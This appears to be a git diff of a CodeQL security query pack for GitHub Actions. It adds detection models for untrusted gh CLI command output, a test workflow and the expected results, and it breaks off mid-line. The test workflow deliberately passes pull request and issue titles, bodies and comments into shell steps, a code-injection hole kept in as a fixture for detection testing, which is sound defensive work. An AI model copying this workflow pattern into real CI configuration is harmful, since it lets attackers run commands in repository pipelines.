insertions(+), 9 deletions(-) create mode 100644 ql/lib/ext/config/untrusted_gh_command.yml rename ql/lib/ext/config/{untrusted_git_commands.yml => untrusted_git_command.yml} (96%) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index 82b7a53a9d7..4dbdcbf5528 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -125,6 +125,16 @@ predicate vulnerableActionsDataModel( * - cmd_regex: Regular expression for matching untrusted git commands * - flag: Flag for the command */ -predicate untrustedGitCommandsDataModel(string cmd_regex, string flag) { - Extensions::untrustedGitCommandsDataModel(cmd_regex, flag) +predicate untrustedGitCommandDataModel(string cmd_regex, string flag) { + Extensions::untrustedGitCommandDataModel(cmd_regex, flag) +} + +/** + * MaD models for untrusted gh commands + * Fields: + * - cmd_regex: Regular expression for matching untrusted gh commands + * - flag: Flag for the command + */ +predicate untrustedGhCommandDataModel(string cmd_regex, string flag) { + Extensions::untrustedGhCommandDataModel(cmd_regex, flag) } diff --git a/ql/lib/codeql/actions/config/ConfigExtensions.qll b/ql/lib/codeql/actions/config/ConfigExtensions.qll index a32e9c445f2..ed575de0eb4 100644 --- a/ql/lib/codeql/actions/config/ConfigExtensions.qll +++ b/ql/lib/codeql/actions/config/ConfigExtensions.qll @@ -61,4 +61,9 @@ extensible predicate vulnerableActionsDataModel( /** * Holds for git commands that may introduce untrusted data when called on an attacker controlled branch. */ -extensible predicate untrustedGitCommandsDataModel(string cmd_regex, string flag); +extensible predicate untrustedGitCommandDataModel(string cmd_regex, string flag); + +/** + * Holds for gh commands that may introduce untrusted data + */ +extensible predicate untrustedGhCommandDataModel(string cmd_regex, string flag); diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 91b110f87ee..56c901434ce 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -80,7 +80,7 @@ class GitCommandSource extends RemoteFlowSource, CommandSource { GitCommandSource() { exists(Step checkout, string cmd_regex | - // This shoould be: + // This should be: // source instanceof PRHeadCheckoutStep // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround @@ -105,8 +105,8 @@ class GitCommandSource extends RemoteFlowSource, CommandSource { checkout.getAFollowingStep() = run and run.getScript().getAStmt() = cmd and cmd.indexOf("git") = 0 and - untrustedGitCommandsDataModel(cmd_regex, flag) and - cmd.regexpMatch(".*" + cmd_regex + ".*") + untrustedGitCommandDataModel(cmd_regex, flag) and + cmd.regexpMatch(cmd_regex + ".*") ) } @@ -117,6 +117,28 @@ class GitCommandSource extends RemoteFlowSource, CommandSource { override Run getEnclosingRun() { result = run } } +class GhCLICommandSource extends RemoteFlowSource, CommandSource { + Run run; + string cmd; + string flag; + + GhCLICommandSource() { + exists(string cmd_regex | + this.asExpr() = run.getScript() and + run.getScript().getAStmt() = cmd and + cmd.indexOf("gh ") = 0 and + untrustedGhCommandDataModel(cmd_regex, flag) and + cmd.regexpMatch(cmd_regex + ".*") + ) + } + + override string getSourceType() { result = flag } + + override Run getEnclosingRun() { result = run } + + override string getCommand() { result = cmd } +} + class GitHubEventPathSource extends RemoteFlowSource, CommandSource { string cmd; string flag; @@ -206,7 +228,7 @@ class ArtifactSource extends RemoteFlowSource, FileSource { */ private class CheckoutSource extends RemoteFlowSource, FileSource { CheckoutSource() { - // This shoould be: + // This should be: // source instanceof PRHeadCheckoutStep // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index 58b7b18ca62..311c3abdb69 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -20,7 +20,7 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { ( step instanceof UntrustedArtifactDownloadStep or - // This shoould be: + // This should be: // artifact instanceof PRHeadCheckoutStep // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround diff --git a/ql/lib/ext/config/untrusted_gh_command.yml b/ql/lib/ext/config/untrusted_gh_command.yml new file mode 100644 index 00000000000..653f9e31c98 --- /dev/null +++ b/ql/lib/ext/config/untrusted_gh_command.yml @@ -0,0 +1,56 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: untrustedGhCommandDataModel + data: + # + # PULL REQUESTS + # + # HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName') + - ["gh\\s+pr\\b.*\\bview\\b.*\\.headRefName.*", "branch,oneline"] + # TITLE=$(gh pr view $PR_NUMBER --json title --jq .title) + - ["gh\\s+pr\\b.*\\bview\\b.*\\.title.*", "title,oneline"] + # BODY=$(gh pr view $PR_NUMBER --json body --jq .body) + - ["gh\\s+pr\\b.*\\bview\\b.*\\.body.*", "text,multiline"] + # COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')" + - ["gh\\s+pr\\b.*\\bview\\b.*\\.comments.*", "text,multiline"] + # CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')" + - ["gh\\s+pr\\b.*\\bview\\b.*\\.files.*", "filename,multiline"] + # AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') + - ["gh\\s+pr\\b.*\\bview\\b.*\\.author.*", "username,oneline"] + # + # ISSUES + # + # TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title') + - ["gh\\s+issue\\b.*\\bview\\b.*\\.title.*", "title,oneline"] + # BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body,assignees --jq .body) + - ["gh\\s+issue\\b.*\\bview\\b.*\\.body.*", "text,multiline"] + # COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body') + - ["gh\\s+issue\\b.*\\bview\\b.*\\.comments.*", "text,multiline"] + # + # API + # + # PR="$(gh api /repos/test/test/pulls/${PR_NUMBER})" + # + # HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' | head -n 1) + - ["gh\\s+api\\b.*\\b(/)?repos/.*/pulls.*\\b.*\\.head.ref.*", "branch,oneline"] + # TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title") + - ["gh\\s+api\\b.*\\b(/)?repos/.*/pulls.*\\b.*\\.title.*", "title,oneline"] + # BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body") + - ["gh\\s+api\\b.*\\b(/)?repos/.*/pulls.*\\b.*\\.body.*", "text,multiline"] + # COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body') + - ["gh\\s+api\\b.*\\b(/)?repos/.*/pulls.*/comments\\b.*\\.body.*", "text,multiline"] + # CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename') + - ["gh\\s+api\\b.*\\b(/)?repos/.*/pulls.*/files\\b.*\\.filename.*", "filename,oneline"] + # AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login") + - ["gh\\s+api\\b.*\\b(/)?repos/.*/pulls.*\\b.*\\.user\\.login.*", "username,oneline"] + # + # ISSUES + # + # TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title") + - ["gh\\s+api\\b.*\\b(/)?repos/.*/issues.*\\b.*\\.title.*", "title,oneline"] + # BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body") + - ["gh\\s+api\\b.*\\b(/)?repos/.*/issues.*\\b.*\\.body.*", "text,multiline"] + # COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body') + - ["gh\\s+api\\b.*\\b(/)?repos/.*/issues.*/comments\\b.*\\.body.*", "text,multiline"] + diff --git a/ql/lib/ext/config/untrusted_git_commands.yml b/ql/lib/ext/config/untrusted_git_command.yml similarity index 96% rename from ql/lib/ext/config/untrusted_git_commands.yml rename to ql/lib/ext/config/untrusted_git_command.yml index b4b96a4af43..e862267027a 100644 --- a/ql/lib/ext/config/untrusted_git_commands.yml +++ b/ql/lib/ext/config/untrusted_git_command.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: github/actions-all - extensible: untrustedGitCommandsDataModel + extensible: untrustedGitCommandDataModel data: # FILES=$(git diff-tree --no-commit-id --name-only HEAD -r) - ["git\\b.*\\bdiff-tree\\b", "filename,multiline"] diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml new file mode 100644 index 00000000000..804d55a7db2 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test19.yml @@ -0,0 +1,112 @@ +name: Pull Request Open + +on: + pull_request_target: + +jobs: + pulls1: + runs-on: ubuntu-latest + steps: + - id: head_ref + run: | + HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName') + echo "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.head_ref.outputs.head_ref}}" + - id: title + run: | + TITLE=$(gh pr view $PR_NUMBER --json title --jq .title) + echo "title=$TITLE" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title.outputs.title}}" + - id: body + run: | + BODY=$(gh pr view $PR_NUMBER --json body --jq .body) + echo "body=$BODY" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.body.outputs.body}}" + - id: comments + run: | + COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')" + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.comments.outputs.comments}}" + - id: files + run: | + CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')" + echo "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.files.outputs.files}}" + - id: author + run: | + AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') + echo "author=$AUTHOR" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.author.outputs.author}}" + pulls2: + runs-on: ubuntu-latest + steps: + - id: head_ref + run: | + HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' | head -n 1) + echo "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.head_ref.outputs.head_ref}}" + - id: title + run: | + TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title") + echo "title=$TITLE" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title.outputs.title}}" + - id: body + run: | + BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body") + echo "body=$BODY" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.body.outputs.body}}" + - id: comments + run: | + COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body') + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.comments.outputs.comments}}" + - id: files + run: | + CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename') + echo "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.files.outputs.files}}" + - id: author + run: | + AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login") + echo "author=$AUTHOR" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.author.outputs.author}}" + issues1: + runs-on: ubuntu-latest + steps: + - id: title + run: | + TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title') + echo "title=$TITLE" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title.outputs.title}}" + - id: body + run: | + BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body') + echo "body=$BODY" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.body.outputs.body}}" + - id: comments + run: | + COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body') + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.comments.outputs.comments}}" + issues2: + runs-on: ubuntu-latest + steps: + - id: title + run: | + TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title") + echo "title=$TITLE" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.title.outputs.title}}" + - id: body + run: | + BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body") + echo "body=$BODY" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.body.outputs.body}}" + - id: comments + run: | + COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body') + echo "comments=$COMMENTS" >> "$GITHUB_OUTPUT" + - run: echo "${{ steps.comments.outputs.comments}}" + + + + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 83faf4eb5e4..8a134a6f7ef 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -160,6 +160,42 @@ edges | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | provenance | | | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | provenance | | | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | provenance | | +| .github/workflows/test19.yml:10:9:14:6 | Run Step: head_ref [head_ref] | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | provenance | | +| .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:10:9:14:6 | Run Step: head_ref [head_ref] | provenance | | +| .github/workflows/test19.yml:15:9:19:6 | Run Step: title [title] | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:15:9:19:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:20:9:24:6 | Run Step: body [body] | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:20:9:24:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:25:9:29:6 | Run Step: comments [comments] | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:25:9:29:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test19.yml:30:9:34:6 | Run Step: files [files] | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | provenance | | +| .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:30:9:34:6 | Run Step: files [files] | provenance | | +| .github/workflows/test19.yml:35:9:39:6 | Run Step: author [author] | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | provenance | | +| .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:35:9:39:6 | Run Step: author [author] | provenance | | +| .github/workflows/test19.yml:43:9:47:6 | Run Step: head_ref [head_ref] | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | provenance | | +| .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:43:9:47:6 | Run Step: head_ref [head_ref] | provenance | | +| .github/workflows/test19.yml:48:9:52:6 | Run Step: title [title] | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:48:9:52:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:53:9:57:6 | Run Step: body [body] | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:53:9:57:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:58:9:62:6 | Run Step: comments [comments] | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:58:9:62:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test19.yml:63:9:67:6 | Run Step: files [files] | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | provenance | | +| .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:63:9:67:6 | Run Step: files [files] | provenance | | +| .github/workflows/test19.yml:68:9:72:6 | Run Step: author [author] | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | provenance | | +| .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:68:9:72:6 | Run Step: author [author] | provenance | | +| .github/workflows/test19.yml:76:9:80:6 | Run Step: title [title] | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:76:9:80:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:81:9:85:6 | Run Step: body [body] | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:81:9:85:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:86:9:90:6 | Run Step: comments [comments] | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:86:9:90:6 | Run Step: comments [comments] | provenance | | +| .github/workflows/test19.yml:94:9:98:6 | Run Step: title [title] | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | provenance | | +| .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:94:9:98:6 | Run Step: title [title] | provenance | | +| .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | provenance | | +| .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:99:9:103:6 | Run Step: body [body] | provenance | | +| .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | provenance | | +| .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:104:9:108:6 | Run Step: comments [comments] | provenance | | | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:11:20:11:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:11:7:13:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:17:9:23:6 | Uses Step: step0 [value] | .github/workflows/test.yml:25:18:25:48 | steps.step0.outputs.value | provenance | | @@ -487,6 +523,60 @@ nodes | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | semmle.label | fromJson(steps.get-pull-request.outputs.data).title | | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | semmle.label | Uses Step: issues | | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | semmle.label | steps.issues.outputs.data | +| .github/workflows/test19.yml:10:9:14:6 | Run Step: head_ref [head_ref] | semmle.label | Run Step: head_ref [head_ref] | +| .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | semmle.label | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | semmle.label | steps.head_ref.outputs.head_ref | +| .github/workflows/test19.yml:15:9:19:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:20:9:24:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:25:9:29:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test19.yml:30:9:34:6 | Run Step: files [files] | semmle.label | Run Step: files [files] | +| .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | semmle.label | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | semmle.label | steps.files.outputs.files | +| .github/workflows/test19.yml:35:9:39:6 | Run Step: author [author] | semmle.label | Run Step: author [author] | +| .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | semmle.label | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | semmle.label | steps.author.outputs.author | +| .github/workflows/test19.yml:43:9:47:6 | Run Step: head_ref [head_ref] | semmle.label | Run Step: head_ref [head_ref] | +| .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | semmle.label | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | semmle.label | steps.head_ref.outputs.head_ref | +| .github/workflows/test19.yml:48:9:52:6 | Run Step: title [title] | semmle.label | Run Step: title [title] | +| .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | semmle.label | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | semmle.label | steps.title.outputs.title | +| .github/workflows/test19.yml:53:9:57:6 | Run Step: body [body] | semmle.label | Run Step: body [body] | +| .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | semmle.label | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | semmle.label | steps.body.outputs.body | +| .github/workflows/test19.yml:58:9:62:6 | Run Step: comments [comments] | semmle.label | Run Step: comments [comments] | +| .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | semmle.label | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | semmle.label | steps.comments.outputs.comments | +| .github/workflows/test19.yml:63:9:67:6 | Run Step: files [files] | semmle.label | Run Step: files [files] | +| .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | semmle.label | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | +| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | semmle.label | steps.files.outputs.files | +| .github/workflows/test19.yml:68:9:72:6 | Run Step: 